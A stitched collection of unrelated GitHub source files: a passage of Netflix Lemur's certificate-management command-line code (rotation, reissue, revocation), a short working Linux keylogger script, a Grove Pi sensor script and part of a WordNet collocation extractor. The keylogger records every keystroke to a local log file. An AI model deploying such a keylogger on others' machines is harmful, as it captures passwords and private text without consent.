status = SUCCESS_METRIC_STATUS
except Exception as e:
capture_exception(extra={"certificate_name": str(certificate.name)})
current_app.logger.exception(
f"Error reissuing certificate: {certificate.name}", exc_info=True
)
print(f"[!] Failed to reissue certificate: {certificate.name}. Reason: {e}")
if notify:
send_reissue_failed_notification(certificate)
metrics.send(
"certificate_reissue",
"counter",
1,
metric_tags={"status": status, "certificate": certificate.name},
)
@manager.option(
"-e",
"--endpoint",
dest="endpoint_name",
help="Name of the endpoint you wish to rotate.",
)
@manager.option(
"-s",
"--source",
dest="source",
help="Source of the endpoint you wish to rotate.",
)
@manager.option(
"-n",
"--new-certificate",
dest="new_certificate_name",
help="Name of the certificate you wish to rotate to.",
)
@manager.option(
"-o",
"--old-certificate",
dest="old_certificate_name",
help="Name of the certificate you wish to rotate.",
)
@manager.option(
"-a",
"--notify",
dest="message",
action="store_true",
help="Send a rotation notification to the certificates owner.",
)
@manager.option(
"-c",
"--commit",
dest="commit",
action="store_true",
default=False,
help="Persist changes.",
)
def rotate(endpoint_name, source, new_certificate_name, old_certificate_name, message, commit):
"""
Rotates an endpoint and reissues it if it has not already been replaced. If it has
been replaced, will use the replacement certificate for the rotation.
"""
if commit:
print("[!] Running in COMMIT mode.")
print("[+] Starting endpoint rotation.")
status = FAILURE_METRIC_STATUS
log_data = {
"function": f"{__name__}.{sys._getframe().f_code.co_name}",
}
try:
old_cert = validate_certificate(old_certificate_name)
new_cert = validate_certificate(new_certificate_name)
if source:
endpoint = validate_endpoint_from_source(endpoint_name, source)
else:
try:
endpoint = validate_endpoint(endpoint_name)
except MultipleResultsFound as e:
print("[!] Multiple endpoints found with name {0}, try narrowing the search down to an endpoint from a specific source by re-running this command with the --source flag.".format(endpoint_name))
log_data["message"] = "Multiple endpoints found with same name, unable to perform rotation"
log_data["duplicated_endpoint_name"] = endpoint_name
current_app.logger.info(log_data)
raise
if endpoint and new_cert:
print(
f"[+] Rotating endpoint: {endpoint.name} to certificate {new_cert.name}"
)
log_data["message"] = "Rotating one endpoint"
log_data["endpoint"] = endpoint.dnsname
log_data["certificate"] = new_cert.name
request_rotation(endpoint, new_cert, message, commit)
current_app.logger.info(log_data)
elif old_cert and new_cert:
print(f"[+] Rotating all endpoints from {old_cert.name} to {new_cert.name}")
log_data["certificate"] = new_cert.name
log_data["certificate_old"] = old_cert.name
log_data["message"] = "Rotating endpoint from old to new cert"
for endpoint in old_cert.endpoints:
print(f"[+] Rotating {endpoint.name}")
log_data["endpoint"] = endpoint.dnsname
request_rotation(endpoint, new_cert, message, commit)
current_app.logger.info(log_data)
else:
# No certificate name or endpoint is provided. We will now fetch all endpoints,
# which are associated with a certificate that has been replaced
print("[+] Rotating all endpoints that have new certificates available")
for endpoint in endpoint_service.get_all_pending_rotation():
log_data["message"] = "Rotating endpoint from old to new cert"
if len(endpoint.certificate.replaced) > 1:
log_data["message"] = f"Multiple replacement certificates found, going with the first one out of " \
f"{len(endpoint.certificate.replaced)}"
log_data["endpoint"] = endpoint.dnsname
log_data["certificate"] = endpoint.certificate.replaced[0].name
print(
f"[+] Rotating {endpoint.name} to {endpoint.certificate.replaced[0].name}"
)
request_rotation(endpoint, endpoint.certificate.replaced[0], message, commit)
current_app.logger.info(log_data)
status = SUCCESS_METRIC_STATUS
print("[+] Done!")
except Exception as e:
capture_exception(
extra={
"old_certificate_name": str(old_certificate_name),
"new_certificate_name": str(new_certificate_name),
"endpoint_name": str(endpoint_name),
"message": str(message),
}
)
metrics.send(
"endpoint_rotation_job",
"counter",
1,
metric_tags={
"status": status,
"old_certificate_name": str(old_certificate_name),
"new_certificate_name": str(new_certificate_name),
"endpoint_name": str(endpoint_name),
"message": str(message),
"endpoint": str(globals().get("endpoint")),
},
)
def request_rotation_region(endpoint, new_cert, message, commit, log_data, region):
if region in endpoint.dnsname:
log_data["message"] = "Rotating endpoint in region"
request_rotation(endpoint, new_cert, message, commit)
else:
log_data["message"] = "Skipping rotation, region mismatch"
print(log_data)
current_app.logger.info(log_data)
@manager.option(
"-e",
"--endpoint",
dest="endpoint_name",
help="Name of the endpoint you wish to rotate.",
)
@manager.option(
"-n",
"--new-certificate",
dest="new_certificate_name",
help="Name of the certificate you wish to rotate to.",
)
@manager.option(
"-o",
"--old-certificate",
dest="old_certificate_name",
help="Name of the certificate you wish to rotate.",
)
@manager.option(
"-a",
"--notify",
dest="message",
action="store_true",
help="Send a rotation notification to the certificates owner.",
)
@manager.option(
"-c",
"--commit",
dest="commit",
action="store_true",
default=False,
help="Persist changes.",
)
@manager.option(
"-r",
"--region",
dest="region",
required=True,
help="Region in which to rotate the endpoint.",
)
def rotate_region(endpoint_name, new_certificate_name, old_certificate_name, message, commit, region):
"""
Rotates an endpoint in a defined region it if it has not already been replaced. If it has
been replaced, will use the replacement certificate for the rotation.
:param old_certificate_name: Name of the certificate you wish to rotate.
:param new_certificate_name: Name of the certificate you wish to rotate to.
:param endpoint_name: Name of the endpoint you wish to rotate.
:param message: Send a rotation notification to the certificates owner.
:param commit: Persist changes.
:param region: Region in which to rotate the endpoint.
#todo: merge this method with rotate()
"""
if commit:
print("[!] Running in COMMIT mode.")
print("[+] Starting endpoint rotation.")
status = FAILURE_METRIC_STATUS
log_data = {
"function": f"{__name__}.{sys._getframe().f_code.co_name}",
"region": region,
}
try:
old_cert = validate_certificate(old_certificate_name)
new_cert = validate_certificate(new_certificate_name)
endpoint = validate_endpoint(endpoint_name)
if endpoint and new_cert:
log_data["endpoint"] = endpoint.dnsname
log_data["certificate"] = new_cert.name
request_rotation_region(endpoint, new_cert, message, commit, log_data, region)
elif old_cert and new_cert:
log_data["certificate"] = new_cert.name
log_data["certificate_old"] = old_cert.name
log_data["message"] = "Rotating endpoint from old to new cert"
print(log_data)
current_app.logger.info(log_data)
for endpoint in old_cert.endpoints:
log_data["endpoint"] = endpoint.dnsname
request_rotation_region(endpoint, new_cert, message, commit, log_data, region)
else:
log_data["message"] = "Rotating all endpoints that have new certificates available"
print(log_data)
current_app.logger.info(log_data)
all_pending_rotation_endpoints = endpoint_service.get_all_pending_rotation()
for endpoint in all_pending_rotation_endpoints:
log_data["endpoint"] = endpoint.dnsname
if region not in endpoint.dnsname:
log_data["message"] = "Skipping rotation, region mismatch"
print(log_data)
current_app.logger.info(log_data)
metrics.send(
"endpoint_rotation_region_skipped",
"counter",
1,
metric_tags={
"region": region,
"new_certificate_name": str(endpoint.certificate.replaced[0].name),
"endpoint_name": str(endpoint.dnsname),
},
)
continue
log_data["certificate"] = endpoint.certificate.replaced[0].name
log_data["message"] = "Rotating all endpoints in region"
if len(endpoint.certificate.replaced) > 1:
log_data["message"] = f"Multiple replacement certificates found, going with the first one out of " \
f"{len(endpoint.certificate.replaced)}"
request_rotation(endpoint, endpoint.certificate.replaced[0], message, commit)
current_app.logger.info(log_data)
metrics.send(
"endpoint_rotation_region",
"counter",
1,
metric_tags={
"status": FAILURE_METRIC_STATUS,
"new_certificate_name": str(log_data["certificate"]),
"endpoint_name": str(endpoint.dnsname),
"message": str(message),
"region": str(region),
},
)
status = SUCCESS_METRIC_STATUS
print("[+] Done!")
except Exception as e:
capture_exception(
extra={
"old_certificate_name": str(old_certificate_name),
"new_certificate_name": str(new_certificate_name),
"endpoint": str(endpoint_name),
"message": str(message),
"region": str(region),
}
)
metrics.send(
"endpoint_rotation_region_job",
"counter",
1,
metric_tags={
"status": status,
"old_certificate_name": str(old_certificate_name),
"new_certificate_name": str(new_certificate_name),
"endpoint_name": str(endpoint_name),
"message": str(message),
"endpoint": str(globals().get("endpoint")),
"region": str(region),
},
)
@manager.option(
"-o",
"--old-certificate",
dest="old_certificate_name",
help="Name of the certificate you wish to reissue.",
)
@manager.option(
"-a",
"--notify",
dest="notify",
action="store_true",
help="Send a re-issue failed notification to the certificates owner (if re-issuance fails).",
)
@manager.option(
"-c",
"--commit",
dest="commit",
action="store_true",
default=False,
help="Persist changes.",
)
def reissue(old_certificate_name, notify, commit):
"""
Reissues certificate with the same parameters as it was originally issued with.
If not time period is provided, reissues certificate as valid from today to
today + length of original.
"""
if commit:
print("[!] Running in COMMIT mode.")
print("[+] Starting certificate re-issuance.")
status = FAILURE_METRIC_STATUS
try:
old_cert = validate_certificate(old_certificate_name)
if not old_cert:
for certificate in get_all_pending_reissue():
request_reissue(certificate, notify, commit)
else:
request_reissue(old_cert, notify, commit)
status = SUCCESS_METRIC_STATUS
print("[+] Done!")
except Exception as e:
capture_exception()
current_app.logger.exception("Error reissuing certificate.", exc_info=True)
print("[!] Failed to reissue certificates. Reason: {}".format(e))
metrics.send(
"certificate_reissue_job", "counter", 1, metric_tags={"status": status}
)
@manager.option(
"-f",
"--fqdns",
dest="fqdns",
help="FQDNs to query. Multiple fqdns specified via comma.",
)
@manager.option("-i", "--issuer", dest="issuer", help="Issuer to query for.")
@manager.option("-o", "--owner", dest="owner", help="Owner to query for.")
@manager.option(
"-e",
"--expired",
dest="expired",
type=bool,
default=False,
help="Include expired certificates.",
)
def query(fqdns, issuer, owner, expired):
"""Prints certificates that match the query params."""
table = []
q = database.session_query(Certificate)
if issuer:
sub_query = (
database.session_query(Authority.id)
.filter(Authority.name.ilike("%{0}%".format(issuer)))
.subquery()
)
q = q.filter(
or_(
Certificate.issuer.ilike("%{0}%".format(issuer)),
Certificate.authority_id.in_(sub_query),
)
)
if owner:
q = q.filter(Certificate.owner.ilike("%{0}%".format(owner)))
if not expired:
q = q.filter(Certificate.expired == False) # noqa
if fqdns:
for f in fqdns.split(","):
q = q.filter(
or_(
Certificate.cn.ilike("%{0}%".format(f)),
Certificate.domains.any(Domain.name.ilike("%{0}%".format(f))),
)
)
for c in q.all():
table.append([c.id, c.name, c.owner, c.issuer])
print(tabulate(table, headers=["Id", "Name", "Owner", "Issuer"], tablefmt="csv"))
def worker(data, commit, reason):
parts = [x for x in data.split(" ") if x]
try:
cert = get(int(parts[0].strip()))
print("[+] Revoking certificate. Id: {0} Name: {1}".format(cert.id, cert.name))
if commit:
revoke_certificate(cert, reason)
metrics.send(
"certificate_revoke",
"counter",
1,
metric_tags={"status": SUCCESS_METRIC_STATUS},
)
except Exception as e:
capture_exception()
metrics.send(
"certificate_revoke",
"counter",
1,
metric_tags={"status": FAILURE_METRIC_STATUS},
)
print("[!] Failed to revoke certificates. Reason: {}".format(e))
@manager.command
def clear_pending():
"""
Function clears all pending certificates.
:return:
"""
v = plugins.get("verisign-issuer")
v.clear_pending_certificates()
@manager.option("-p", "--path", dest="path", help="Absolute file path to a Lemur query csv.")
@manager.option("-id", "--certid", dest="cert_id", help="ID of the certificate to be revoked")
@manager.option("-r", "--reason", dest="reason", default="unspecified", help="CRL Reason as per RFC 5280 section 5.3.1")
@manager.option("-m", "--message", dest="message", help="Message explaining reason for revocation")
@manager.option(
"-c",
"--commit",
dest="commit",
action="store_true",
default=False,
help="Persist changes.",
)
def revoke(path, cert_id, reason, message, commit):
"""
Revokes given certificate.
"""
if not path and not cert_id:
print("[!] No input certificates mentioned to revoke")
return
if path and cert_id:
print("[!] Please mention single certificate id (-id) or input file (-p)")
return
if commit:
print("[!] Running in COMMIT mode.")
print("[+] Starting certificate revocation.")
if reason not in CRLReason.__members__:
reason = CRLReason.unspecified.name
comments = {"comments": message, "crl_reason": reason}
if cert_id:
worker(cert_id, commit, comments)
else:
with open(path, "r") as f:
for x in f.readlines()[2:]:
worker(x, commit, comments)
@manager.command
def check_revoked():
"""
Function attempts to update Lemur's internal cache with revoked
certificates. This is called periodically by Lemur. It checks both
CRLs and OCSP to see if a certificate is revoked. If Lemur is unable
encounters an issue with verification it marks the certificate status
as `unknown`.
"""
log_data = {
"function": f"{__name__}.{sys._getframe().f_code.co_name}",
"message": "Checking for revoked Certificates"
}
there_are_still_certs = True
page = 1
count = 1000
ocsp_err_count = 0
crl_err_count = 0
while there_are_still_certs:
# get all valid certs issued until day before. This is to avoid OCSP not knowing about a newly created cert.
certs = get_all_valid_certs(current_app.config.get("SUPPORTED_REVOCATION_AUTHORITY_PLUGINS", []),
paginate=True, page=page, count=count,
created_on_or_before=arrow.now().shift(days=-1))
if len(certs) < count:
# this must be tha last page
there_are_still_certs = False
else:
metrics.send(
"certificate_revoked_progress",
"counter",
1,
metric_tags={"page": page}
)
page += 1
for cert in certs:
try:
if cert.chain:
status, ocsp_err, crl_err = verify_string(cert.body, cert.chain)
else:
status, ocsp_err, crl_err = verify_string(cert.body, "")
ocsp_err_count += ocsp_err
crl_err_count += crl_err
if status is None:
cert.status = "unknown"
else:
cert.status = "valid" if status else "revoked"
if cert.status == "revoked":
log_data["valid"] = cert.status
log_data["certificate_name"] = cert.name
log_data["certificate_id"] = cert.id
metrics.send(
"certificate_revoked",
"counter",
1,
metric_tags={"status": log_data["valid"],
"certificate_name": log_data["certificate_name"],
"certificate_id": log_data["certificate_id"]},
)
current_app.logger.info(log_data)
except Exception as e:
capture_exception()
current_app.logger.warning(e)
cert.status = "unknown"
try:
database.update(cert)
except Exception as e:
capture_exception()
current_app.logger.warning(e)
metrics.send(
"certificate_revoked_ocsp_error",
"gauge",
ocsp_err_count,
)
metrics.send(
"certificate_revoked_crl_error",
"gauge",
crl_err_count,
)
metrics.send(
"certificate_revoked_checked",
"gauge",
(page - 1) * count + len(certs),
)
@manager.command
def automatically_enable_autorotate_with_endpoint():
"""
This function automatically enables auto-rotation for unexpired certificates that are
attached to an endpoint but do not have autorotate enabled.
WARNING: This will overwrite the Auto-rotate toggle!
"""
log_data = {
"function": f"{__name__}.{sys._getframe().f_code.co_name}",
"message": "Enabling auto-rotate for certificate"
}
permitted_authorities = current_app.config.get("ENABLE_AUTO_ROTATE_AUTHORITY", [])
eligible_certs = get_all_certs_attached_to_endpoint_without_autorotate()
for cert in eligible_certs:
if cert.authority_id not in permitted_authorities:
continue
log_data["certificate"] = cert.name
log_data["certificate_id"] = cert.id
log_data["authority_id"] = cert.authority_id
log_data["authority_name"] = authorities_get_by_id(cert.authority_id).name
if cert.destinations:
log_data["destination_names"] = ', '.join([d.label for d in cert.destinations])
else:
log_data["destination_names"] = "NONE"
current_app.logger.info(log_data)
metrics.send("automatically_enable_autorotate_with_endpoint",
"counter", 1,
metric_tags={"certificate": log_data["certificate"],
"certificate_id": log_data["certificate_id"],
"authority_id": log_data["authority_id"],
"authority_name": log_data["authority_name"],
"destination_names": log_data["destination_names"]
})
cert.rotation = True
database.update(cert)
@manager.command
def automatically_enable_autorotate_with_destination():
"""
This function automatically enables auto-rotation for unexpired certificates that are
attached to a destination but do not have autorotate enabled.
WARNING: This will overwrite the Auto-rotate toggle!
"""
log_data = {
"function": f"{__name__}.{sys._getframe().f_code.co_name}",
"message": "Enabling auto-rotate for certificate"
}
permitted_authorities = current_app.config.get("ENABLE_AUTO_ROTATE_AUTHORITY", [])
destination_plugin_name = current_app.config.get("ENABLE_AUTO_ROTATE_DESTINATION_TYPE", None)
eligible_certs = get_all_certs_attached_to_destination_without_autorotate(plugin_name=destination_plugin_name)
for cert in eligible_certs:
if cert.authority_id not in permitted_authorities:
continue
log_data["certificate"] = cert.name
log_data["certificate_id"] = cert.id
log_data["authority_id"] = cert.authority_id
log_data["authority_name"] = authorities_get_by_id(cert.authority_id).name
if cert.destinations:
log_data["destination_names"] = ', '.join([d.label for d in cert.destinations])
else:
log_data["destination_names"] = "NONE"
current_app.logger.info(log_data)
metrics.send("automatically_enable_autorotate_with_destination",
"counter", 1,
metric_tags={"certificate": log_data["certificate"],
"certificate_id": log_data["certificate_id"],
"authority_id": log_data["authority_id"],
"authority_name": log_data["authority_name"],
"destination_names": log_data["destination_names"]
})
cert.rotation = True
database.update(cert)
@manager.command
def deactivate_entrust_certificates():
"""
Attempt to deactivate test certificates issued by Entrust
"""
log_data = {
"function": f"{__name__}.{sys._getframe().f_code.co_name}",
"message": "Deactivating Entrust certificates"
}
certificates = get_all_valid_certs(['entrust-issuer'])
entrust_plugin = plugins.get('entrust-issuer')
for index, cert in enumerate(certificates):
if (index % 10) == 0:
# Entrust enforces a 10 request per 30s rate limit
sleep(30)
try:
response = entrust_plugin.deactivate_certificate(cert)
if response == 200:
cert.status = "revoked"
else:
cert.status = "unknown"
log_data["valid"] = cert.status
log_data["certificate_name"] = cert.name
log_data["certificate_id"] = cert.id
metrics.send(
"certificate_deactivate",
"counter",
1,
metric_tags={"status": log_data["valid"],
"certificate_name": log_data["certificate_name"],
"certificate_id": log_data["certificate_id"]},
)
current_app.logger.info(log_data)
database.update(cert)
except Exception as e:
current_app.logger.info(log_data)
capture_exception()
current_app.logger.exception(e)
@manager.option("-c", "--commit", dest="commit", action="store_true", default=False, help="Persist changes.")
def disable_rotation_of_duplicate_certificates(commit):
log_data = {
"function": f"{__name__}.{sys._getframe().f_code.co_name}",
"message": "Disabling auto-rotate for duplicate certificates"
}
if commit:
print("[!] Running in COMMIT mode.")
authority_names = current_app.config.get("AUTHORITY_TO_DISABLE_ROTATE_OF_DUPLICATE_CERTIFICATES")
if not authority_names:
log_data["message"] = "Skipping task: No authorities configured"
current_app.logger.debug(log_data)
return
log_data["authorities"] = authority_names
days_since_issuance = current_app.config.get("DAYS_SINCE_ISSUANCE_DISABLE_ROTATE_OF_DUPLICATE_CERTIFICATES", None)
log_data["days_since_issuance"] = f"{days_since_issuance} (Ignored if none)"
authority_ids = []
invalid_authorities = []
for authority_name in authority_names:
authority = get_authority_by_name(authority_name)
if authority:
authority_ids.append(authority.id)
else:
invalid_authorities.append(authority_name)
if invalid_authorities:
log_data["warning"] = f"Non-existing authorities: {invalid_authorities}"
if not authority_ids:
log_data["message"] = "Skipping task: No valid authorities configured"
current_app.logger.error(log_data)
return
duplicate_candidate_certs = list_duplicate_certs_by_authority(authority_ids, days_since_issuance)
log_data["certs_with_serial_number_count"] = len(duplicate_candidate_certs)
current_app.logger.info(log_data)
skipped_certs = []
rotation_disabled_certs = []
unique_prefix = []
failed_certs = []
for duplicate_candidate_cert in duplicate_candidate_certs:
success, duplicates = process_duplicates(duplicate_candidate_cert,
skipped_certs,
rotation_disabled_certs,
unique_prefix,
commit
)
if not success:
for cert in duplicates:
failed_certs.append(cert.name)
metrics.send("disable_rotation_duplicates", "counter", 1,
metric_tags={"status": "failed", "certificate": cert.name}
)
# certs_with_serial_number_count + unique_cert_prefix_count should be equal to
# rotation_disabled_cert_count + rotation_disabled_cert_count + failed_to_determine_if_duplicate_count
log_data["message"] = "Summary of task run"
log_data["unique_cert_prefix_count"] = len(unique_prefix)
log_data["rotation_disabled_cert_count"] = len(rotation_disabled_certs)
log_data["certificate_with_no_change_count"] = len(skipped_certs)
log_data["failed_to_determine_if_duplicate_count"] = len(failed_certs)
current_app.logger.info(log_data)
def process_duplicates(duplicate_candidate_cert, skipped_certs, rotation_disabled_certs, processed_unique_prefix, commit):
"""
Process duplicates with same prefix as duplicate_candidate_cert
:param duplicate_candidate_cert: Name of the certificate which has duplicates
:param skipped_certs: List of certificates which will continue to have rotation on (no change)
:param rotation_disabled_certs: List of certificates for which rotation got disabled as part of this job
:param processed_unique_prefix: List of unique prefixes to avoid rework
:return: Success - True or False; If False, set of duplicates which were not processed
"""
name_without_serial_num = duplicate_candidate_cert.name[:duplicate_candidate_cert.name.rindex("-")]
if name_without_serial_num in processed_unique_prefix:
return True, None
processed_unique_prefix.append(name_without_serial_num)
prefix_to_match = name_without_serial_num + '%'
certs_with_same_prefix = get_certificates_with_same_prefix_with_rotate_on(prefix_to_match)
if len(certs_with_same_prefix) == 1:
# this is the only cert with rotation ON, no further action needed
skipped_certs.append(certs_with_same_prefix[0].name)
metrics.send("disable_rotation_duplicates", "counter", 1,
metric_tags={"status": "skipped", "certificate": certs_with_same_prefix[0].name}
)
return True, None
skip_cert = False
certs_to_stay_on_autorotate = []
for matching_cert in certs_with_same_prefix:
if matching_cert.name == name_without_serial_num:
# There exists a cert with name same as the prefix (most likely there will always be one)
# Keep auto rotate on for this one if no cert has endpoint associated
fallback_cert_to_rotate = name_without_serial_num
if matching_cert.name == duplicate_candidate_cert.name:
# Same cert, no need to compare
continue
# Even if one of the cert with same prefix has different details, skip this set of certs
# it's safe to do so and this logic can be revisited
if not is_duplicate(matching_cert, duplicate_candidate_cert):
skip_cert = True
break
# Find certs with endpoint, auto-rotate needs to be on for these
if matching_cert.endpoints:
certs_to_stay_on_autorotate.append(matching_cert.name)
if skip_cert:
# Not reporting failure for skipping cert since they are not duplicates,
# comparision is working as intended
for skipped_cert in certs_with_same_prefix:
skipped_certs.append(skipped_cert.name)
metrics.send("disable_rotation_duplicates", "counter", 1,
metric_tags={"status": "skipped", "certificate": skipped_cert.name}
)
return True, None
# If no certificate has endpoint, pick fallback_cert_to_rotate or any one to allow one certificate to auto-rotate.
if not certs_to_stay_on_autorotate:
certs_to_stay_on_autorotate.append(fallback_cert_to_rotate if fallback_cert_to_rotate else certs_with_same_prefix[0])
for matching_cert in certs_with_same_prefix:
if matching_cert.name in certs_to_stay_on_autorotate:
skipped_certs.append(matching_cert.name)
metrics.send("disable_rotation_duplicates", "counter", 1,
metric_tags={"status": "skipped", "certificate": matching_cert.name}
)
else:
# disable rotation and update DB
matching_cert.rotation = False
if commit:
database.update(matching_cert)
rotation_disabled_certs.append(matching_cert.name)
metrics.send("disable_rotation_duplicates", "counter", 1,
metric_tags={"status": "success", "certificate": matching_cert.name}
)
return True, None
def is_duplicate(matching_cert, compare_to):
if (
matching_cert.owner != compare_to.owner
or matching_cert.san != compare_to.san
or matching_cert.key_type != compare_to.key_type
or matching_cert.not_before.date() != compare_to.not_before.date()
or matching_cert.not_after.date() != compare_to.not_after.date()
):
return False
matching_destinations = [destination.label for destination in matching_cert.destinations]
compare_to_destinations = [destination.label for destination in compare_to.destinations]
if (len(matching_destinations) == len(compare_to_destinations)
and set(matching_destinations) == set(compare_to_destinations)):
matching_sans = [domain.name for domain in matching_cert.domains]
compare_to_sans = [domain.name for domain in compare_to.domains]
return len(matching_sans) == len(compare_to_sans) and set(matching_sans) == set(compare_to_sans)
return False
@manager.option(
"-e",
"--exclude",
dest="exclude_domains",
action="append",
default=[],
help="Domains that should be excluded from check.",
)
@manager.option(
"-eo",
"--exclude-owners",
dest="exclude_owners",
action="append",
default=[],
help="Owners that should be excluded from check.",
)
@manager.option(
"-c",
"--commit",
dest="commit",
action="store_true",
default=False,
help="Persist changes.",
)
def identify_expiring_deployed_certificates(exclude_domains, exclude_owners, commit):
status = FAILURE_METRIC_STATUS
try:
identify_and_persist_expiring_deployed_certificates(exclude_domains, exclude_owners, commit)
status = SUCCESS_METRIC_STATUS
except Exception:
capture_exception()
current_app.logger.exception("Error identifying expiring deployed certificates", exc_info=True)
metrics.send("identify_expiring_deployed_certificates", "counter", 1, metric_tags={"status": status})
@manager.command
def expiration_metrics(expiry_window):
"""
Iterates over all certificates and emits a metric for the days remaining for a certificate to expire.
This is used for building custom dashboards and alerts for certificate expiry.
"""
try:
print("Starting to publish metrics for time left until cert expirations")
success, failure = send_certificate_expiration_metrics(expiry_window)
print(
f"Finished publishing metrics for time left until cert expirations! Sent: {success}"
)
status = SUCCESS_METRIC_STATUS
except Exception as e:
status = FAILURE_METRIC_STATUS
capture_exception()
metrics.send(
"expiration_metrics_job", "counter", 1, metric_tags={"status": status}
)
|
{
"content_hash": "57f2340f75d2e08afabd57d95cb63eca",
"timestamp": "",
"source": "github",
"line_count": 1156,
"max_line_length": 209,
"avg_line_length": 36.28546712802768,
"alnum_prop": 0.5971487150145425,
"repo_name": "Netflix/lemur",
"id": "a6091ce55fc5103c0d359222131b5e3701e5c6a2",
"size": "41946",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lemur/certificates/cli.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2728"
},
{
"name": "Dockerfile",
"bytes": "2597"
},
{
"name": "HTML",
"bytes": "314713"
},
{
"name": "JavaScript",
"bytes": "15496"
},
{
"name": "Makefile",
"bytes": "3791"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1530505"
},
{
"name": "Shell",
"bytes": "2339"
}
],
"symlink_target": ""
}
|
"""
Copyright (c) 2015, Aman Deep
All rights reserved.
A simple keylogger witten in python for linux platform
All keystrokes are recorded in a log file.
The program terminates when grave key(`) is pressed
grave key is found below Esc key
"""
import pyxhook
#change this to your log file's path
log_file='/home/aman/Desktop/file.log'
#this function is called everytime a key is pressed.
def OnKeyPress(event):
fob=open(log_file,'a')
fob.write(event.Key)
fob.write('\n')
if event.Ascii==96: #96 is the ascii value of the grave key (`)
fob.close()
new_hook.cancel()
#instantiate HookManager class
new_hook=pyxhook.HookManager()
#listen to all keystrokes
new_hook.KeyDown=OnKeyPress
#hook the keyboard
new_hook.HookKeyboard()
#start the session
new_hook.start()
|
{
"content_hash": "5ace588611f96ce514264794c781b4e0",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 65,
"avg_line_length": 22.970588235294116,
"alnum_prop": 0.7413572343149808,
"repo_name": "hiamandeep/py-keylogger",
"id": "8a5d636a52ce2c75124eca2d09e0e578dbb56c65",
"size": "781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "keylogger.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16605"
}
],
"symlink_target": ""
}
|
from grovepi import *
from grove_rgb_lcd import *
dht_sensor_port = 7
dht_sensor_type = 0
ultrasonic_ranger = 4
distance_threshold = 20
try:
(temp, hum) = dht(dht_sensor_port, dht_sensor_type)
distance = ultrasonicRead(ultrasonic_ranger)
if (distance <= distance_threshold):
setRGB(0,255,0)
setText("Temp: {:d}C Humidity : {:d}%".format(int(temp), int(hum)))
else:
setRGB(0,0,0)
setText("")
print "{:d}#{:d}".format(int(temp), int(hum))
except (IOError,TypeError) as e:
print "Error"
exit(0)
|
{
"content_hash": "9d61dd306fa60f72df642c20c98f45b8",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 81,
"avg_line_length": 24.26086956521739,
"alnum_prop": 0.6164874551971327,
"repo_name": "davidone/misc",
"id": "cf1e14541729aad77d949e37ed4afa3df5b8790d",
"size": "581",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dht.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "58"
},
{
"name": "Python",
"bytes": "2660"
},
{
"name": "Shell",
"bytes": "605"
}
],
"symlink_target": ""
}
|
from nltk.corpus import wordnet
import re
from .pos_tagger import POS_tag_cleaner
# Method to determine if a phrase is a collocation based on dictionary based technique
# Uses WordNet from NLTK corpus to obtain definitions of the words when both
# the word and it's sense are passed as inputs
def Collocations_Method_1(_n_grams_from_input_text_file, _input_file_path, _apply_POS_restrictions, _verbose):
if _verbose:
# A file to save the verbose output of the program
_output_file_verbose = str(_input_file_path).replace(_input_file_path.split('/')[-1], 'verbose.txt')
_output_file_verbose = open(_output_file_verbose, 'a')
print("\n--------------------------------------------------------------------------", file = _output_file_verbose)
print("\tMethod-1: WordNet - Extracting collocations:", file = _output_file_verbose)
print("--------------------------------------------------------------------------\n\n", file = _output_file_verbose)
print("\tMethod-1: Using WordNet to extract collocations ...")
# A list to store n-gram phrases that are collocations
wordnet_collocations = []
# A list to store n-gram phrases that are not collocations
n_grams_not_collocations = []
for _n_gram in _n_grams_from_input_text_file:
if _verbose:
print("\n%s:" %(_n_gram), file = _output_file_verbose)
if _n_gram in wordnet_collocations or _n_gram in n_grams_not_collocations:
# If a particular n-gram phrase is checked if it is a collocation before,
# it will be present in one of the lists, wordnet_collocations OR n_grams_not_collocations
# Hence, we move on to the next n-gram
continue
else:
# Before checking if the n-gram is defined in WordNet we check if atlease one
# POS tag is from the valid POS tag list: {Noun, Verb, Adverb, Adjective} if
# _apply_POS_restrictions is set to True
if _apply_POS_restrictions:
valid_POS_tags = ['NN', 'VB', 'RB', 'JJ']
_valid_POS_tag_counter = 0 # A counter to count the number of valid POS tags in n-gram
for _pos_tag in valid_POS_tags:
if _pos_tag in _n_gram:
_valid_POS_tag_counter += 1
if _valid_POS_tag_counter == 0:
# If no valid POS tag is present in the n-gram, it is not a collocation
# when POS restrictions are applied
n_grams_not_collocations.append(_n_gram)
if _verbose:
print("\t'%s' does not have valid POS tags\n\tMoving on to the next phrase ..." %(_n_gram), file = _output_file_verbose)
continue # We move to the next n-gram in the list
# If POS restrictions are not to be applied on the n-gram
_n_gram_lower = _n_gram.lower() + ' ' # Lower case
_n_gram_lower = re.sub(r'_.*? ', ' ', _n_gram_lower).rstrip(' ')
_n_gram_lower = _n_gram_lower.replace(' ', '_')
if _verbose:
print("\tLooking for phrase definitions in WordNet ...", file = _output_file_verbose)
syn_sets = wordnet.synsets(_n_gram_lower)
if len(syn_sets) == 0:
if _verbose:
print("\tWordNet does not have definitions for '%s'" %(_n_gram_lower), file = _output_file_verbose)
n_grams_not_collocations.append(_n_gram)
continue
else:
wordnet_collocations.append(_n_gram)
if _verbose:
print("\tCOLLOCATION: '%s' is defined in WordNet" %(_n_gram_lower), file = _output_file_verbose)
continue
# Output text file to save collocations
_output_file_path_wordnet_collocations = str(_input_file_path).replace(_input_file_path.split('/')[-1], 'collocations_wordnet.txt')
with open(_output_file_path_wordnet_collocations, 'w') as _output_file_wordnet_collocations:
for _collocation in wordnet_collocations:
print(POS_tag_cleaner(_collocation) + '\n', file = _output_file_wordnet_collocations)
if _verbose:
print("\n\tMethod-1: WordNet - Collocations are written to the file:\n\t%s" %(_output_file_path_wordnet_collocations), file = _output_file_verbose)
# Output text file to save n-grams that are not collocations
_output_file_path_wordnet_not_collocations = str(_input_file_path).replace(_input_file_path.split('/')[-1], 'not_collocations_wordnet.txt')
_output_file_wordnet_not_collocations = open(_output_file_path_wordnet_not_collocations, 'w')
